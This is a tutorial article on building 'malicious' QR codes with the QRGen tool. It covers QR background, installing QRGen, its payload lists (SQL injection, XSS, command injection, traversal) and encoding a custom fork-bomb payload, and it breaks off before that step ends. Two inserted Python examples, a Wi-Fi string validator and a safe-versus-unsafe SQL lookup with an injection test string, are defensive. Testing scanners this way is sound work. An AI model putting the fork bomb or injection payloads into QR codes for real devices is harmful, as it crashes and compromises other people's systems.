Generate malicious QR codes to hack phones and scanners

Author: Dr. Leslie Schwab. Source: https://www.shiftfrequency.com... 2021-11-13 23:34:00


QR codes are everywhere, from product packaging to airline boarding passes, making scanners that read them a delicious target for hackers.

Due to defects in many of these scanners, it is possible to exploit common vulnerabilities using exploits formatted into custom QR codes. A tool called QRGen can generate malicious QR codes and even encode custom payloads.

These attacks are quite effective because people cannot read or understand the information contained in a QR code without scanning it, which can expose any device used to decode the code to the exploit contained inside.

Even QR scanners, such as smartphones, can be vulnerable to this type of attack, as QR codes have been found to lure iPhone users to malicious websites.

What are QR codes?

QR codes are machine-readable data formats that are useful for anything that needs to be scanned automatically. Before QR codes, there were many other formats called barcodes, which also stored data in a way that was easy for machines to read.

You've probably seen a UPC barcode on products, where it identifies items for sale so that cashiers can scan them for faster checkout.

The UPC barcode, or Universal Product Code, has been in use since 1974. It is aimed mainly at retailers and encodes only a series of numbers, which limits what it can do. While there are many different types of barcodes, they are not able to store much information.

2D Barcodes for more data

The answer to barcode limitation was 2D codes, which offer greater storage of information contained within them. Some of the first two-dimensional codes resembled the following, which is still widely used today.

[Image: Aztec code]

An Aztec code is a 2D code similar to a QR code, and it can contain more information than a barcode. Originally developed for logistics, it is used on packages and folders when more data needs to be stored than a barcode can provide.

Other types of 2D codes may contain extremely large amounts of data. The PDF417 format on the back of most licenses in the United States, for example, can encode up to 1800 ASCII characters.

PDF417 codes as above can encode text, numbers, files and actual data bytes and are more error resistant than barcodes. Companies such as FedEx use a combination of PDF417 and other barcodes on their packaging sheets to automate their delivery and tracking.

What can codes with more data do?

QR codes started in the automotive industry as a way to track cars as they were manufactured, but quickly grew in popularity outside of this industry. Similar to other two-dimensional codes, QR codes can pack large amounts of data and can even work when reduced in resolution or damaged.

A single QR code can contain 4,296 ASCII characters, which allows you to be much more creative about what you can do with them. You can even format the data to take action when it is recognized by a reader.

An exciting application of QR codes enabled by their larger data capacity is their use to manage Wi-Fi connections without sharing a plain text password.

By encoding the following string, you can generate a QR code that automatically logs Android users in to a Wi-Fi network.

WIFI:S:;T:;P:;H:;

Anyone who scans the QR code on an Android device will automatically be connected to the encrypted Wi-Fi network. To find out how much data a QR code can pack, take a look at this code:

[Image: QR code]

This tiny code contains the following text:

Version 40 QR Code can contain up to 1852 chars.
A QR code (abbreviated from Quick Response code) is a type of matrix barcode (or two-dimensional code) that is designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The information encoded may be text, a URL, or other data.
Created by Toyota subsidiary Denso Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes.
The QR code was designed to allow its contents to be decoded at high speed.
The technology has seen frequent use in Japan and South Korea; the United Kingdom is the seventh-largest national consumer of QR codes.
Although initially used for tracking parts in vehicle manufacturing, QR codes now are used in a much broader context,
including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (termed mobile tagging).
QR codes may be used to display text to the user, to add a vCard contact to the user's device, to open a Uniform Resource Identifier (URI), or to compose an e-mail or text message.
Users can generate and print their own QR codes for others to scan and use by visiting one of several paid and free QR code generating sites or apps.

The text in the image is larger than the QR code itself! Capacity makes QR codes both powerful and dangerous, because people cannot understand the data in them without first scanning them.
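Because the scanner is the only thing that can read the string, it is also the place to check it. The following is an added example (not from the original article or from any scanner's code): a Python parser for the WIFI: format above, where S is the network name, T the security type, P the password and H the hidden-network flag, that rejects malformed input and builds a summary to show the user before joining. The function names, the length limit and the list of accepted security types are assumptions.

```python
# Added example: validate a decoded WIFI: string before acting on it.
import re

FIELDS = {"S": "ssid", "T": "auth", "P": "password", "H": "hidden"}
AUTH_TYPES = {"", "nopass", "WEP", "WPA"}   # assumed policy allowlist
RAW_FIELD = r"(?:\\.|[^\\;])*"              # escaped or ordinary characters


def parse_wifi_qr(text, max_len=512):
    """Return the network settings in a WIFI: string, or raise ValueError."""
    if len(text) > max_len:
        raise ValueError("payload too long for a Wi-Fi configuration")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in text):
        raise ValueError("control character in payload")
    if not text.startswith("WIFI:"):
        raise ValueError("not a WIFI: payload")
    body = text[len("WIFI:"):]
    if not re.fullmatch(f"(?:{RAW_FIELD};)+", body):
        raise ValueError("field not terminated by ';'")
    config = {"ssid": "", "auth": "", "password": "", "hidden": ""}
    for raw in re.findall(f"({RAW_FIELD});", body):
        if not raw:                         # empty field from the closing ';;'
            continue
        key, sep, value = raw.partition(":")
        if sep != ":" or key not in FIELDS:
            raise ValueError(f"unexpected field {raw[:8]!r}")
        config[FIELDS[key]] = re.sub(r"\\(.)", r"\1", value)  # resolve \; \: \\
    if not config["ssid"]:
        raise ValueError("missing SSID")
    if config["auth"] not in AUTH_TYPES:
        raise ValueError("unknown authentication type")
    config["hidden"] = config["hidden"].lower() == "true"
    return config


def describe(config):
    """One-line summary a scanner can show before the user agrees to join."""
    auth = config["auth"]
    security = auth if auth not in ("", "nopass") else "open (no encryption)"
    return f'Join Wi-Fi "{config["ssid"]}", security: {security}'


if __name__ == "__main__":
    sample = r"WIFI:S:Cafe\;Guest;T:WPA;P:pa\:ss;H:true;;"   # constructed input
    print(describe(parse_wifi_qr(sample)))
```

The empty template shown earlier is rejected for its missing network name, and an open network is labelled as such in the summary instead of being joined silently.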

QRGen for QR Code Hacking

Because a person cannot detect a malicious QR code before scanning it, the relatively large payload of a QR code can work to the benefit of a hacker, especially when paired with vulnerable devices. The tool we will use today to create them is called QRGen. It will take a payload and encode it into a QR code using Python.

QRGen comes with a built-in library that contains many popular exploits, which are extremely useful if you have time to sit down with the same kind of device you want to take advantage of and find out what works against it.

For a pentester who wants to test anything using a QR code scanner, simply purchasing the scanner itself and running the exploits can lead the scanner to behave in unexpected ways.

The payload categories available on QRGen are accessible using the flag -l and a number when executing the script. The number and type of payload are listed below.

0: SQL Injections
1: XSS
2: Command Injection
3: Format String
4: XXE
5: String Fuzzing
6: SSI Injection
7: LFI / Directory Traversal

To create a batch of malicious QR codes that contain string-fuzzing payloads, I just need to run qrgen.py -l 5, and I will have many codes to test.
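Every category in this list only works when the software behind the scanner treats decoded text as part of a query, command or document instead of as data. As an added example (not QRGen code and not part of the original article), here is that defect beside its fix for category 0, using a constructed in-memory inventory table; the table, the SKU format and the function names are assumptions.

```python
# Added example: how a scanner back end should treat decoded QR text.
import re
import sqlite3

SKU_FORMAT = re.compile(r"[A-Z0-9-]{1,32}")   # assumed format of this shop's labels


def make_inventory():
    """Constructed in-memory table standing in for a scanner's product database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (sku TEXT PRIMARY KEY, name TEXT, price REAL)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [("A-100", "cable", 4.5), ("B-200", "router", 89.0)])
    return db


def lookup_unsafe(db, scanned):
    """Defective pattern: scan text is pasted into the SQL statement itself."""
    return db.execute(f"SELECT name FROM items WHERE sku = '{scanned}'").fetchall()


def lookup_safe(db, scanned):
    """Hardened: allowlist the expected format, then bind the value as data."""
    if not SKU_FORMAT.fullmatch(scanned):
        return None                      # reject and log; never pass it further
    return db.execute("SELECT name FROM items WHERE sku = ?", (scanned,)).fetchall()


if __name__ == "__main__":
    db = make_inventory()
    odd_scan = "x' OR '1'='1"            # constructed input with SQL metacharacters
    print(lookup_unsafe(db, odd_scan))   # every row comes back
    print(lookup_safe(db, odd_scan))     # rejected before reaching the database
    print(lookup_safe(db, "A-100"))      # normal label still resolves
```

Either control alone stops this input: the bound parameter is compared as a literal string, and the allowlist refuses anything that is not shaped like a label. Running a scanner's back end against the generated codes is a way to confirm that both are in place.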

What you will need

To use QRGen, you will need to install Python 3. Because Python is cross-platform, this should be possible on any operating system. You will also need some Python libraries, including qrcode, Pillow and argparse, which we will install during setup.

Step 1: Install QRGen

To get started with QRGen, you will need to download the repository from GitHub. We will do this by executing the following command in a terminal window.

~$ git clone https://github.com/h0nus/QRGen

Cloning into 'QRGen'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

Once the repository download is complete, change (cd) into its directory and type ls to view its contents and find the requirements file.

~$ cd QRGen
~/QRGen$ ls

demo.gif  qrgen.py  README.md  requirements.txt  words

Now, we need to make sure we have all the required libraries installed. To do this, we will install from the requirements file with the following command.

~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If this does not work, you can also install it with this alternative command.

~/QRGen$ python3 -m pip install -r requirements.txt

Step 2: Generate malicious QR codes from a payload type

Now, you should be able to run the script by typing python3 qrgen.py.

~/QRGen$ python3 qrgen.py

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

usage: qrgen.py -l [number]
usage: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0 : SQL Injections
1 : XSS
2 : Command Injection
3 : Format String
4 : XXE
5 : String Fuzzing
6 : SSI Injection
7 : LFI / Directory Traversal

Tool to generate Malformed QRCodes for fuzzing QRCode parsers/reader

optional arguments:
  -h, --help            show this help message and exit

Options for QRGen:
  --list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
                        Set wordlist to use
  --wordlist WORDLIST, -w WORDLIST
                        Use a custom wordlist

As you can see, creating payloads is very simple. To get started, let's create QR codes that contain string-fuzzing payloads. To do this, run QRGen with the following argument.

python3 qrgen.py -l 5

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

Payload path generated..
Path already cleared or deleted..
Generated 46 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus..

A series of QR codes will be generated and the last one created will open automatically.

To see the rest of the payloads, you can enter cd genqr to go to the directory where they are created and ls to see their content.

~/QRGen$ cd genqr
~/QRGen/genqr$ ls

payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png
payload-18.png  payload-27.png  payload-36.png  payload-45.png

Step 3: Encode custom payloads

To encode custom payloads, we first create a text file that contains what we want to encode. Each line will be a new payload. We can create the text file by typing nano badstuff.txt.

~/QRGen/genqr$ nano badstuff.txt

In this text file, we can put our payload. The following is a fork bomb. It will work in a QR code scanner.

:(){ :|: & };:

We can save it by pressing Control-X, then Y and Enter to confirm the save. Now, you should see a text file containing your payload.

~/QRGen/genqr$ ls

badstuff.txt    payload-18.png  payload-27.png  payload-36.png  payload-45.png
payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png

To write the payload in a QR code, we will use the flag -w. Assuming your payload file is called "badstuff.txt", the command to do this should look like this (remember to go back to the QRGen directory).
